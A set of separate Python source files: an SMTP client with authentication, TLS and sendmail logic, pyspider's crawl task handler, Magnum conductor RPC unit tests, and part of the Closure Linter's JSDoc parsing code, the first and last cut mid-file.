AUTH_PLAIN + " " + encode_plain(user, password))
elif authmethod == AUTH_LOGIN:
(code, resp) = self.docmd("AUTH",
"%s %s" % (AUTH_LOGIN, encode_base64(user, eol="")))
if code != 334:
raise SMTPAuthenticationError(code, resp)
(code, resp) = self.docmd(encode_base64(password, eol=""))
elif authmethod == None:
raise SMTPException("No suitable authentication method found.")
if code not in [235, 503]:
# 235 == 'Authentication successful'
# 503 == 'Error: already authenticated'
raise SMTPAuthenticationError(code, resp)
return (code, resp)
def starttls(self, keyfile = None, certfile = None):
"""Puts the connection to the SMTP server into TLS mode.
If the server supports TLS, this will encrypt the rest of the SMTP
session. If you provide the keyfile and certfile parameters,
the identity of the SMTP server and client can be checked. This,
however, depends on whether the socket module really checks the
certificates.
"""
(resp, reply) = self.docmd("STARTTLS")
if resp == 220:
sslobj = socket.ssl(self.sock, keyfile, certfile)
self.sock = SSLFakeSocket(self.sock, sslobj)
self.file = SSLFakeFile(sslobj)
return (resp, reply)
def sendmail(self, from_addr, to_addrs, msg, mail_options=None, rcpt_options=None):
"""This command performs an entire mail transaction.
The arguments are::
:from_addr: The address sending this mail.
:to_addrs: A list of addresses to send this mail to. A bare
string will be treated as a list with 1 address.
:msg: The message to send.
:mail_options: List of ESMTP options (such as 8bitmime) for the
mail command.
:rcpt_options: List of ESMTP options (such as DSN commands) for
all the rcpt commands.
If there has been no previous EHLO or HELO command this session, this
method tries ESMTP EHLO first. If the server does ESMTP, message size
and each of the specified options will be passed to it. If EHLO
fails, HELO will be tried and ESMTP options suppressed.
This method will return normally if the mail is accepted for at least
one recipient. It returns a dictionary, with one entry for each
recipient that was refused. Each entry contains a tuple of the SMTP
error code and the accompanying error message sent by the server.
This method may raise the following exceptions::
:SMTPHeloError: The server didn't reply properly to
the helo greeting.
:SMTPRecipientsRefused: The server rejected ALL recipients
(no mail was sent).
:SMTPSenderRefused: The server didn't accept the from_addr.
:SMTPDataError: The server replied with an unexpected
error code (other than a refusal of
a recipient).
Note: the connection will be open even after an exception is raised.
Example::
>>> import smtplib
>>> s=smtplib.SMTP("localhost")
>>> tolist=["one@one.org","two@two.org","three@three.org","four@four.org"]
>>> msg = '''\\
... From: Me@my.org
... Subject: testin'...
...
... This is a test '''
>>> s.sendmail("me@my.org",tolist,msg)
{ "three@three.org" : ( 550 ,"User unknown" ) }
>>> s.quit()
In the above example, the message was accepted for delivery to three
of the four addresses, and one was rejected, with the error code
550. If all addresses are accepted, then the method will return an
empty dictionary.
"""
if self.helo_resp is None and self.ehlo_resp is None:
if not (200 <= self.ehlo()[0] <= 299):
(code,resp) = self.helo()
if not (200 <= code <= 299):
raise SMTPHeloError(code, resp)
esmtp_opts = []
if self.does_esmtp:
if self.has_extn('size'):
esmtp_opts.append("size={0:d}".format(len(msg)))
if mail_options:
for option in mail_options:
esmtp_opts.append(option)
(code,resp) = self.mail(from_addr, esmtp_opts)
if code != 250:
self.rset()
raise SMTPSenderRefused(code, resp, from_addr)
senderrs={}
if isinstance(to_addrs, str):
to_addrs = [to_addrs]
for each in to_addrs:
(code,resp)=self.rcpt(each, rcpt_options)
if (code != 250) and (code != 251):
senderrs[each]=(code,resp)
if len(senderrs)==len(to_addrs):
# the server refused all our recipients
self.rset()
raise SMTPRecipientsRefused(senderrs)
(code,resp) = self.data(msg)
if code != 250:
self.rset()
raise SMTPDataError(code, resp)
#if we got here then somebody got our mail
return senderrs
def close(self):
"""Close the connection to the SMTP server."""
if self.file:
self.file.close()
self.file = None
if self.sock:
self.sock.close()
self.sock = None
def quit(self):
"""Terminate the SMTP session."""
rv = self.docmd("QUIT")
self.close()
return rv
class Envelope(object):
"""Envelope([mail_from], [recpt_list])
An envelope holds an SMTP conversation from the MAIL FROM command to the end of
a DATA part. It may be re-sent by calling the 'send()' method with an SMTP
connection object. The message body can be parsed by passing in an 'email'
parser object to the 'parse()' method."""
def __init__ (self, mail_from=None, rcpt_to=None):
self.mail_from = mail_from
self.rcpt_to = rcpt_to or []
self.data = None
self.message = None
def __repr__ (self):
return "Envelope(%r, %r)" % (self.mail_from, self.rcpt_to)
def __str__(self):
s = ["MAIL FROM: %s" % (self.mail_from,)]
for rcpt in self.rcpt_to:
s.append("RCPT TO: %s" % (rcpt))
s.append("\n")
if self.message:
s.append(str(self.message))
elif self.data:
s.append(self.data.getvalue())
else:
s.append("<no data!>")
return "\n".join(s)
def has_data(self):
"""has_data() is true if there is data or message."""
if self.data:
return self.data.tell()
elif self.message:
return len(self.message)
else:
return 0
def write(self, text):
"""write(text)
Writes text to the message body."""
if self.data is None:
self.data = BytesIO()
self.data.write(text)
def writeln(self, text):
"""writeln(text)
Writes text to the message body, adding a newline."""
self.write(text)
self.write("\n")
def set_from(self, frm):
"""set_from(from_address)
Sets the MAIL FROM address for this Envelope."""
self.mail_from = frm
def add_rcpt(self, rcpt):
"""add_rcpt(recipient)
Adds a new recipient to the RCPT list."""
self.rcpt_to.append(rcpt)
def parse_data(self, parser):
"""parse_data(parser)
Instructs the Envelope to convert its raw 'data' attribute to a 'message'
attribute using the supplied parser object. A 'message' attribute is an
'email' package Message tree."""
if self.data is not None:
self.data.seek(0,0)
# parser should be email.Parser.Parser object, or subclass thereof.
self.message = parser.parse(self.data)
self.data.close()
if self.message:
self.data = None
def send(self, smtp, mail_options=None, rcpt_options=None):
"""Mails this envelope using the supplied SMTP client object."""
if self.message:
return smtp.sendmail(self.mail_from, self.rcpt_to, self.message.as_string(), mail_options, rcpt_options)
elif self.data:
return smtp.sendmail(self.mail_from, self.rcpt_to, self.data.getvalue(), mail_options, rcpt_options)
else:
body = "From: %s\nTo: %s\n\nEnvelope message." % (self.mail_from, ", ".join(self.rcpt_to))
return smtp.sendmail(self.mail_from, self.rcpt_to, body, mail_options, rcpt_options)
def get_mailer(host="", port=SMTP_PORT, logfile=None):
return SMTP(str(host), int(port), logfile=logfile)
def test(argv):
def prompt(prompt):
return input(prompt+": ")
#fromaddr = prompt("From")
#toaddrs = prompt("To")
#mailhost = prompt("mailhost")
fromaddr = "keith@dartworks.biz"
toaddrs = "keith@dartworks.biz"
mailhost = "localhost"
#print ("Enter message, end with empty line:")
msg = 'From: %s\nTo: %s\nSubject: test message\n\n' % (fromaddr, toaddrs)
#while 1:
# line = raw_input("> ")
# if not line:
# break
# msg = msg + line
msg = msg + "A message \n\n.\n"
server = SMTP()
server.connect(mailhost, 9025)
server.sendmail(fromaddr, toaddrs.split(","), msg)
server.quit()
# Test the sendmail method, which tests most of the others.
# Note: This always sends to localhost.
if __name__ == '__main__':
import sys
test(sys.argv)
| |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-16 23:12:48
import sys
import inspect
import functools
import fractions
import six
from six import add_metaclass, iteritems
from pyspider.libs.log import LogFormatter
from pyspider.libs.url import quote_chinese, _build_url, _encode_params, _encode_multipart_formdata
from pyspider.libs.utils import md5string, hide_me, pretty_unicode
from pyspider.libs.ListIO import ListO
from pyspider.libs.response import rebuild_response
from pyspider.libs.pprint import pprint
class ProcessorResult(object):
"""The result and logs producted by a callback"""
def __init__(self, result, follows, messages, logs, exception, extinfo):
self.result = result
self.follows = follows
self.messages = messages
self.logs = logs
self.exception = exception
self.extinfo = extinfo
def rethrow(self):
"""rethrow the exception"""
if self.exception:
raise self.exception
def logstr(self):
"""handler the log records to formatted string"""
result = []
formater = LogFormatter(color=False)
for record in self.logs:
if isinstance(record, six.string_types):
result.append(pretty_unicode(record))
else:
if record.exc_info:
a, b, tb = record.exc_info
tb = hide_me(tb, globals())
record.exc_info = a, b, tb
result.append(pretty_unicode(formater.format(record)))
result.append(u'\n')
return u''.join(result)
def catch_status_code_error(func):
"""
Non-200 response will been regarded as fetch failed and will not pass to callback.
Use this decorator to override this feature.
"""
func._catch_status_code_error = True
return func
def not_send_status(func):
"""
Do not send process status package back to scheduler.
It's used by callbacks like on_message, on_result etc...
"""
@functools.wraps(func)
def wrapper(self, response, task):
self._extinfo['not_send_status'] = True
function = func.__get__(self, self.__class__)
return self._run_func(function, response, task)
return wrapper
def config(_config=None, **kwargs):
"""
A decorator for setting the default kwargs of `BaseHandler.crawl`.
Any self.crawl with this callback will use this config.
"""
if _config is None:
_config = {}
_config.update(kwargs)
def wrapper(func):
func._config = _config
return func
return wrapper
class NOTSET(object):
pass
def every(minutes=NOTSET, seconds=NOTSET):
"""
method will been called every minutes or seconds
"""
def wrapper(func):
@functools.wraps(func)
def on_cronjob(self, response, task):
if (
response.save
and 'tick' in response.save
and response.save['tick'] % (minutes * 60 + seconds) != 0
):
return None
function = func.__get__(self, self.__class__)
return self._run_func(function, response, task)
on_cronjob.is_cronjob = True
on_cronjob.tick = minutes * 60 + seconds
return on_cronjob
if inspect.isfunction(minutes):
func = minutes
minutes = 1
seconds = 0
return wrapper(func)
if minutes is NOTSET:
if seconds is NOTSET:
minutes = 1
seconds = 0
else:
minutes = 0
if seconds is NOTSET:
seconds = 0
return wrapper
class BaseHandlerMeta(type):
def __new__(cls, name, bases, attrs):
cron_jobs = []
min_tick = 0
for each in attrs.values():
if inspect.isfunction(each) and getattr(each, 'is_cronjob', False):
cron_jobs.append(each)
min_tick = fractions.gcd(min_tick, each.tick)
newcls = type.__new__(cls, name, bases, attrs)
newcls._cron_jobs = cron_jobs
newcls._min_tick = min_tick
return newcls
@add_metaclass(BaseHandlerMeta)
class BaseHandler(object):
"""
BaseHandler for all scripts.
`BaseHandler.run` is the main method to handler the task.
"""
crawl_config = {}
project_name = None
_cron_jobs = []
_min_tick = 0
__env__ = {'not_inited': True}
def _reset(self):
"""
reset before each task
"""
self._extinfo = {}
self._messages = []
self._follows = []
self._follows_keys = set()
def _run_func(self, function, *arguments):
"""
Running callback function with requested number of arguments
"""
args, varargs, keywords, defaults = inspect.getargspec(function)
return function(*arguments[:len(args) - 1])
def _run_task(self, task, response):
"""
Finding callback specified by `task['callback']`
raising status error for it if needed.
"""
self._reset()
if isinstance(response, dict):
response = rebuild_response(response)
process = task.get('process', {})
callback = process.get('callback', '__call__')
if not hasattr(self, callback):
raise NotImplementedError("self.%s() not implemented!" % callback)
function = getattr(self, callback)
if not getattr(function, '_catch_status_code_error', False):
response.raise_for_status()
return self._run_func(function, response, task)
def run_task(self, module, task, response):
"""
Processing the task, catching exceptions and logs, return a `ProcessorResult` object
"""
logger = module.logger
result = None
exception = None
stdout = sys.stdout
self.task = task
self.response = response
try:
sys.stdout = ListO(module.log_buffer)
result = self._run_task(task, response)
if inspect.isgenerator(result):
for r in result:
self._run_func(self.on_result, r, response, task)
else:
self._run_func(self.on_result, result, response, task)
except Exception as e:
logger.exception(e)
exception = e
finally:
self.task = None
self.response = None
sys.stdout = stdout
follows = self._follows
messages = self._messages
logs = list(module.log_buffer)
extinfo = self._extinfo
module.log_buffer[:] = []
return ProcessorResult(result, follows, messages, logs, exception, extinfo)
def _crawl(self, url, **kwargs):
"""
real crawl API
checking kwargs, and repack them to each sub-dict
"""
task = {}
if kwargs.get('callback'):
callback = kwargs['callback']
if isinstance(callback, six.string_types) and hasattr(self, callback):
func = getattr(self, callback)
elif six.callable(callback) and six.get_method_self(callback) is self:
func = callback
kwargs['callback'] = func.__name__
else:
raise NotImplementedError("self.%s() not implemented!" % callback)
if hasattr(func, '_config'):
for k, v in iteritems(func._config):
kwargs.setdefault(k, v)
for k, v in iteritems(self.crawl_config):
kwargs.setdefault(k, v)
url = quote_chinese(_build_url(url.strip(), kwargs.get('params')))
if kwargs.get('files'):
assert isinstance(
kwargs.get('data', {}), dict), "data must be a dict when using with files!"
content_type, data = _encode_multipart_formdata(kwargs.get('data', {}),
kwargs.get('files', {}))
kwargs.setdefault('headers', {})
kwargs['headers']['Content-Type'] = content_type
kwargs['data'] = data
if kwargs.get('data'):
kwargs['data'] = _encode_params(kwargs['data'])
if kwargs.get('data'):
kwargs.setdefault('method', 'POST')
schedule = {}
for key in ('priority', 'retries', 'exetime', 'age', 'itag', 'force_update'):
if key in kwargs and kwargs[key] is not None:
schedule[key] = kwargs[key]
task['schedule'] = schedule
fetch = {}
for key in (
'method',
'headers',
'data',
'timeout',
'allow_redirects',
'cookies',
'proxy',
'etag',
'last_modifed',
'save',
'js_run_at',
'js_script',
'load_images',
'fetch_type'
):
if key in kwargs and kwargs[key] is not None:
fetch[key] = kwargs[key]
task['fetch'] = fetch
process = {}
for key in ('callback', ):
if key in kwargs and kwargs[key] is not None:
process[key] = kwargs[key]
task['process'] = process
task['project'] = self.project_name
task['url'] = url
task['taskid'] = task.get('taskid') or self.get_taskid(task)
cache_key = "%(project)s:%(taskid)s" % task
if cache_key not in self._follows_keys:
self._follows_keys.add(cache_key)
self._follows.append(task)
return task
def get_taskid(self, task):
'''Generate taskid by information of task md5(url) by default, override me'''
return md5string(task['url'])
# apis
def crawl(self, url, **kwargs):
'''
avalable params:
url
callback
method
params
data
files
headers
timeout
allow_redirects
cookies
proxy
etag
last_modifed
fetch_type
js_run_at
js_script
load_images
priority
retries
exetime
age
itag
save
taskid
full documents: http://pyspider.readthedocs.org/en/latest/apis/self.crawl/
'''
if isinstance(url, six.string_types):
return self._crawl(url, **kwargs)
elif hasattr(url, "__iter__"):
result = []
for each in url:
result.append(self._crawl(each, **kwargs))
return result
def is_debugger(self):
"""Return true if running in debugger"""
return self.__env__.get('debugger')
def send_message(self, project, msg, url='data:,on_message'):
"""Send messages to other project."""
self._messages.append((project, msg, url))
def on_message(self, project, msg):
"""Receive message from other project, override me."""
pass
def on_result(self, result):
"""Receiving returns from other callback, override me."""
if not result:
return
assert self.task, "on_result can't outside a callback."
if self.is_debugger():
pprint(result)
if self.__env__.get('result_queue'):
self.__env__['result_queue'].put((self.task, result))
@not_send_status
def _on_message(self, response):
project, msg = response.save
return self.on_message(project, msg)
@not_send_status
def _on_cronjob(self, response, task):
for cronjob in self._cron_jobs:
function = cronjob.__get__(self, self.__class__)
self._run_func(function, response, task)
@not_send_status
def _on_get_info(self, response, task):
"""Sending runtime infomation about this script."""
result = {}
assert response.save
for each in response.save:
if each == 'min_tick':
result[each] = self._min_tick
self.crawl('data:,on_get_info', save=result)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for :py:class:`magnum.conductor.rpcapi.API`.
"""
import copy
import mock
from magnum.conductor import api as conductor_rpcapi
from magnum.tests.unit.db import base
from magnum.tests.unit.db import utils as dbutils
class RPCAPITestCase(base.DbTestCase):
def setUp(self):
super(RPCAPITestCase, self).setUp()
self.fake_bay = dbutils.get_test_bay(driver='fake-driver')
self.fake_container = dbutils.get_test_container(driver='fake-driver')
self.fake_pod = dbutils.get_test_pod(driver='fake-driver')
self.fake_rc = dbutils.get_test_rc(driver='fake-driver')
self.fake_service = dbutils.get_test_service(driver='fake-driver')
self.fake_x509keypair = dbutils.get_test_x509keypair(
driver='fake-driver')
def _test_rpcapi(self, method, rpc_method, **kwargs):
rpcapi_cls = kwargs.pop('rpcapi_cls', conductor_rpcapi.API)
rpcapi = rpcapi_cls(topic='fake-topic')
expected_retval = 'hello world' if rpc_method == 'call' else None
expected_topic = 'fake-topic'
if 'host' in kwargs:
expected_topic += ".%s" % kwargs['host']
target = {
"topic": expected_topic,
"version": kwargs.pop('version', 1.0)
}
expected_msg = copy.deepcopy(kwargs)
self.fake_args = None
self.fake_kwargs = None
def _fake_prepare_method(*args, **kwargs):
for kwd in kwargs:
self.assertEqual(kwargs[kwd], target[kwd])
return rpcapi._client
def _fake_rpc_method(*args, **kwargs):
self.fake_args = args
self.fake_kwargs = kwargs
if expected_retval:
return expected_retval
with mock.patch.object(rpcapi._client, "prepare") as mock_prepared:
mock_prepared.side_effect = _fake_prepare_method
with mock.patch.object(rpcapi._client, rpc_method) as mock_method:
mock_method.side_effect = _fake_rpc_method
retval = getattr(rpcapi, method)(**kwargs)
self.assertEqual(retval, expected_retval)
expected_args = [None, method, expected_msg]
for arg, expected_arg in zip(self.fake_args, expected_args):
self.assertEqual(arg, expected_arg)
def test_bay_create(self):
self._test_rpcapi('bay_create',
'call',
version='1.0',
bay=self.fake_bay,
bay_create_timeout=15)
def test_bay_delete(self):
self._test_rpcapi('bay_delete',
'call',
version='1.0',
uuid=self.fake_bay['uuid'])
self._test_rpcapi('bay_delete',
'call',
version='1.1',
uuid=self.fake_bay['name'])
def test_bay_update(self):
self._test_rpcapi('bay_update',
'call',
version='1.1',
bay=self.fake_bay['name'])
def test_service_create(self):
self._test_rpcapi('service_create',
'call',
version='1.0',
service=self.fake_service)
def test_service_update(self):
self._test_rpcapi('service_update',
'call',
version='1.0',
service=self.fake_service)
def test_service_delete(self):
self._test_rpcapi('service_delete',
'call',
version='1.0',
uuid=self.fake_service['uuid'])
self._test_rpcapi('service_delete',
'call',
version='1.1',
uuid=self.fake_service['name'])
def test_pod_create(self):
self._test_rpcapi('pod_create',
'call',
version='1.0',
pod=self.fake_pod)
def test_pod_update(self):
self._test_rpcapi('pod_update',
'call',
version='1.1',
pod=self.fake_pod['name'])
def test_pod_delete(self):
self._test_rpcapi('pod_delete',
'call',
version='1.0',
uuid=self.fake_pod['uuid'])
self._test_rpcapi('pod_delete',
'call',
version='1.1',
uuid=self.fake_pod['name'])
def test_rc_create(self):
self._test_rpcapi('rc_create',
'call',
version='1.0',
rc=self.fake_rc)
def test_rc_update(self):
self._test_rpcapi('rc_update',
'call',
version='1.0',
rc=self.fake_rc)
def test_rc_delete(self):
self._test_rpcapi('rc_delete',
'call',
version='1.0',
uuid=self.fake_rc['uuid'])
self._test_rpcapi('rc_delete',
'call',
version='1.1',
uuid=self.fake_rc['name'])
def test_container_create(self):
self._test_rpcapi('container_create',
'call',
version='1.0',
container=self.fake_container)
def test_container_delete(self):
self._test_rpcapi('container_delete',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_show(self):
self._test_rpcapi('container_show',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_reboot(self):
self._test_rpcapi('container_reboot',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_stop(self):
self._test_rpcapi('container_stop',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_start(self):
self._test_rpcapi('container_start',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_pause(self):
self._test_rpcapi('container_pause',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_unpause(self):
self._test_rpcapi('container_unpause',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_logs(self):
self._test_rpcapi('container_logs',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'])
def test_container_exec(self):
self._test_rpcapi('container_exec',
'call',
version='1.0',
container_uuid=self.fake_container['uuid'],
command=self.fake_container['command'])
def test_ping_conductor(self):
self._test_rpcapi('ping_conductor',
'call',
rpcapi_cls=conductor_rpcapi.ListenerAPI,
version='1.0')
def test_x509keypair_create(self):
self._test_rpcapi('x509keypair_create',
'call',
version='1.0',
x509keypair=self.fake_x509keypair)
def test_x509keypair_delete(self):
self._test_rpcapi('x509keypair_delete',
'call',
version='1.0',
uuid=self.fake_x509keypair['uuid'])
self._test_rpcapi('x509keypair_delete',
'call',
version='1.1',
uuid=self.fake_x509keypair['name'])
| |
#!/usr/bin/env python
#
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Light weight EcmaScript state tracker that reads tokens and tracks state."""
__author__ = ('robbyw@google.com (Robert Walker)',
'ajp@google.com (Andy Perelson)')
import re
from closure_linter import javascripttokenizer
from closure_linter import javascripttokens
from closure_linter import tokenutil
# Shorthand
Type = javascripttokens.JavaScriptTokenType
class DocFlag(object):
"""Generic doc flag object.
Attribute:
flag_type: param, return, define, type, etc.
flag_token: The flag token.
type_start_token: The first token specifying the flag type,
including braces.
type_end_token: The last token specifying the flag type,
including braces.
type: The type spec.
name_token: The token specifying the flag name.
name: The flag name
description_start_token: The first token in the description.
description_end_token: The end token in the description.
description: The description.
"""
# Please keep these lists alphabetized.
# The list of standard jsdoc tags is from
STANDARD_DOC = frozenset([
'author',
'bug',
'const',
'constructor',
'define',
'deprecated',
'enum',
'export',
'extends',
'externs',
'fileoverview',
'implements',
'implicitCast',
'interface',
'lends',
'license',
'noalias',
'nocompile',
'nosideeffects',
'override',
'owner',
'param',
'preserve',
'private',
'return',
'see',
'supported',
'template',
'this',
'type',
'typedef',
])
ANNOTATION = frozenset(['preserveTry', 'suppress'])
LEGAL_DOC = STANDARD_DOC | ANNOTATION
# Includes all Closure Compiler @suppress types.
# Not all of these annotations are interpreted by Closure Linter.
#
# Specific cases:
# - accessControls is supported by the compiler at the expression
# and method level to suppress warnings about private/protected
# access (method level applies to all references in the method).
# The linter mimics the compiler behavior.
SUPPRESS_TYPES = frozenset([
'accessControls',
'ambiguousFunctionDecl',
'checkRegExp',
'checkTypes',
'checkVars',
'const',
'constantProperty',
'deprecated',
'duplicate',
'es5Strict',
'externsValidation',
'extraProvide',
'extraRequire',
'fileoverviewTags',
'globalThis',
'internetExplorerChecks',
'invalidCasts',
'missingProperties',
'missingProvide',
'missingRequire',
'nonStandardJsDocs',
'strictModuleDepCheck',
'tweakValidation',
'typeInvalidation',
'undefinedVars',
'underscore',
'unknownDefines',
'uselessCode',
'visibility',
'with'])
HAS_DESCRIPTION = frozenset([
'define', 'deprecated', 'desc', 'fileoverview', 'license', 'param',
'preserve', 'return', 'supported'])
HAS_TYPE = frozenset([
'define', 'enum', 'extends', 'implements', 'param', 'return', 'type',
'suppress'])
TYPE_ONLY = frozenset(['enum', 'extends', 'implements', 'suppress', 'type'])
HAS_NAME = frozenset(['param'])
EMPTY_COMMENT_LINE = re.compile(r'^\s*\*?\s*$')
EMPTY_STRING = re.compile(r'^\s*$')
def __init__(self, flag_token):
"""Creates the DocFlag object and attaches it to the given start token.
Args:
flag_token: The starting token of the flag.
"""
self.flag_token = flag_token
self.flag_type = flag_token.string.strip().lstrip('@')
# Extract type, if applicable.
self.type = None
self.type_start_token = None
self.type_end_token = None
if self.flag_type in self.HAS_TYPE:
brace = tokenutil.SearchUntil(flag_token, [Type.DOC_START_BRACE],
Type.FLAG_ENDING_TYPES)
if brace:
end_token, contents = _GetMatchingEndBraceAndContents(brace)
self.type = contents
self.type_start_token = brace
self.type_end_token = end_token
elif (self.flag_type in self.TYPE_ONLY and
flag_token.next.type not in Type.FLAG_ENDING_TYPES):
self.type_start_token = flag_token.next
self.type_end_token, self.type = _GetEndTokenAndContents(
self.type_start_token)
if self.type is not None:
self.type = self.type.strip()
# Extract name, if applicable.
self.name_token = None
self.name = None
if self.flag_type in self.HAS_NAME:
# Handle bad case, name could be immediately after flag token.
self.name_token = _GetNextIdentifierToken(flag_token)
# Handle good case, if found token is after type start, look for
# identifier after type end, since types contain identifiers.
if (self.type and self.name_token and
tokenutil.Compare(self.name_token, self.type_start_token) > 0):
self.name_token = _GetNextIdentifierToken(self.type_end_token)
if self.name_token:
self.name = self.name_token.string
# Extract description, if applicable.
self.description_start_token = None
self.description_end_token = None
self.description = None
if self.flag_type in self.HAS_DESCRIPTION:
search_start_token = flag_token
if self.name_token and self.type_end_token:
if tokenutil.Compare(self.type_end_token, self.name_token) > 0:
search_start_token = self.type_end_token
else:
search_start_token = self.name_token
elif self.name_token:
search_start_token = self.name_token
elif self.type:
search_start_token = self.type_end_token
interesting_token = tokenutil.Search(search_start_token,
Type.FLAG_DESCRIPTION_TYPES | Type.FLAG_ENDING_TYPES)
if interesting_token.type in Type.FLAG_DESCRIPTION_TYPES:
self.description_start_token = interesting_token
self.description_end_token, self.description = (
_GetEndTokenAndContents(interesting_token))
class DocComment(object):
"""JavaScript doc comment object.
Attributes:
ordered_params: Ordered list of parameters documented.
start_token: The token that starts the doc comment.
end_token: The token that ends the doc comment.
suppressions: Map of suppression type to the token that added it.
"""
def __init__(self, start_token):
"""Create the doc comment object.
Args:
start_token: The first token in the doc comment.
"""
self.__params = {}
self.ordered_params = []
self.__flags = {}
self.start_token = start_token
self.end_token = None
self.suppressions = {}
self.invalidated = False
def Invalidate(self):
"""Indicate that the JSDoc is well-formed but we had problems parsing it.
This is a short-circuiting mechanism so that we don't emit false
positives about well-formed doc comments just because we don't support
hot new syntaxes.
"""
self.invalidated = True
def IsInvalidated(self):
"""Test whether Invalidate() has been called."""
return self.invalidated
def AddParam(self, name, param_type):
"""Add a new documented parameter.
Args:
name: The name of the parameter to document.
param_type: The parameter's declared JavaScript type.
"""
self.ordered_params.append(name)
self.__params[name] = param_type
def AddSuppression(self, token):
"""Add a new error suppression flag.
Args:
token: The suppression flag token.
"""
#TODO(user): Error if no braces
brace = tokenutil.SearchUntil(token, [Type.DOC_START_BRACE],
[Type.DOC_FLAG])
if brace:
end_token, contents = _GetMatchingEndBraceAndContents(brace)
for suppression in contents.split('|'):
self.suppressions[suppression] = token
def SuppressionOnly(self):
"""Returns whether this comment contains only suppression flags."""
for flag_type in self.__flags.keys():
if flag_type != 'suppress':
return False
return True
def AddFlag(self, flag):
"""Add a new document flag.
Args:
flag: DocFlag object.
"""
self.__flags[flag.flag_type] = flag
def InheritsDocumentation(self):
"""Test if the jsdoc implies documentation inheritance.
Returns:
True if documentation may be pulled off the superclass.
"""
return self.HasFlag('inheritDoc') or self.HasFlag('override')
def HasFlag(self, flag_type):
"""Test if the given flag has been set.
Args:
flag_type: The type of the flag to check.
Returns:
True if the flag is set.
"""
return flag_type in self.__flags
def GetFlag(self, flag_type):
"""Gets the last flag of the given type.
Args:
flag_type: The type of the flag to get.
Returns:
The last instance of the given flag type in this doc comment.
"""
return self.__flags[flag_type]
def CompareParameters(self, params):
"""Computes the edit distance and list from the function params to the docs.
Uses the Levenshtein edit distance algorithm, with code modified from
http://en.wikibooks.org/wiki/Algorithm_implementation/Strings/Levenshtein_distance#Python
Args:
params: The parameter list for the function declaration.
Returns:
The edit distance, the edit list.
"""
source_len, target_len = len(self.ordered_params), len(params)
edit_lists = [[]]
distance = [[]]
for i in range(target_len+1):
edit_lists[0].append(['I'] * i)
distance[0].append(i)
for j in range(1, source_len+1):
edit_lists.append([['D'] * j])
distance.append([j])
for i in range(source_len):
for j in range(target_len):
cost = 1
if self.ordered_params[i] == params[j]:
cost = 0
deletion = distance[i][j+1] + 1
insertion = distance[i+1][j] + 1
substitution = distance[i][j] + cost
edit_list = None
best = None
if deletion <= insertion and deletion <= substitution:
# Deletion is best.
best = deletion
edit_list = list(edit_lists[i][j+1])
edit_list.append('D')
elif insertion <= substitution:
# Insertion is best.
best = insertion
edit_list = list(edit_lists[i+1][j])
edit_list.append('I')
edit_lists[i+1].append(edit_list)
else:
# Substitution is best.
best = substitution
edit_list = list(edit_lists[i][j])
if cost:
edit_list.append('S')
else:
edit_list.append('=')
edit_lists[i+1].append(edit_list)
distance[i+1].append(best)
return distance[source_len][target_len], edit_lists[source_len][target_len]
def __repr__(self):
"""Returns a string representation of this object.
Returns:
A string representation of this object.
"""
return '<DocComment: %s, %s>' % (str(self.__params), str(self.__flags))
#
# Helper methods used by DocFlag and DocComment to parse out flag information.
#
def _GetMatchingEndBraceAndContents(start_brace):
"""Returns the matching end brace and contents between the two braces.
If any FLAG_ENDING_TYPE token is encountered before a matching end brace, then
that token is used as the matching ending token. Contents will have all
comment prefixes stripped out of them, and all comment prefixes in between the
start and end tokens will be split out into separate DOC_PREFIX tokens.
Args:
start_brace: The DOC_START_BRACE token immediately before desired contents.
Returns:
The matching ending token (DOC_END_BRACE or FLAG_ENDING_TYPE) and a string
of the contents between the matching tokens, minus any comment prefixes.
"""
open_count = 1
close_count = 0
contents = []
# We don't consider the start brace part of the type string.
token = start_brace.next
while open_count != close_count:
if token.type == Type.DOC_START_BRACE:
open_count += 1
elif token.type == Type.DOC_END_BRACE:
close_count += 1
if token.type != Type.DOC_PREFIX:
contents.append(token.string)
if token.type in Type.FLAG_ENDING_TYPES:
break
token = token.next
#Don't include the end token (end brace, end doc comment, etc.) in type.
token = token.previous
contents = contents[:-1]
return token, ''.join(contents)
def _GetNextIdentifierToken(start_token):
"""Searches for and returns the first identifier at the beginning of a token.
Searches each token after the start to see if it starts with an identifier.
If found, will split the token into at most 3 piecies: leading whitespace,
identifier, rest of token, returning the identifier token. If no identifier is
found returns None and changes no tokens. Search is abandoned when a
FLAG_ENDING_TYPE token is found.
Args:
start_token: The token to start searching after.
Returns:
The identifier token is found, None otherwise.
"""
token = start_token.next
while token and not token.type in Type.FLAG_ENDING_TYPES:
match = javascripttokenizer.JavaScriptTokenizer.IDENTIFIER.match(
token.string)
if (match is not None and token.type == Type.COMMENT and
len(token.string) == len(match.group(0))):
return token
token = token.next
return None
def _GetEndTokenAndContents(start_token):
"""Returns last content token and all contents before FLAG_ENDING_TYPE token.
Comment prefixes are split into DOC_PREFIX tokens and stripped from the
returned contents.
Args:
start_token: The token immediately before the first content token.
Returns:
The last content token and a string of all contents including start and
end tokens, with comment prefixes stripped.
"""
iterator = start_token
last_line = iterator.line_number
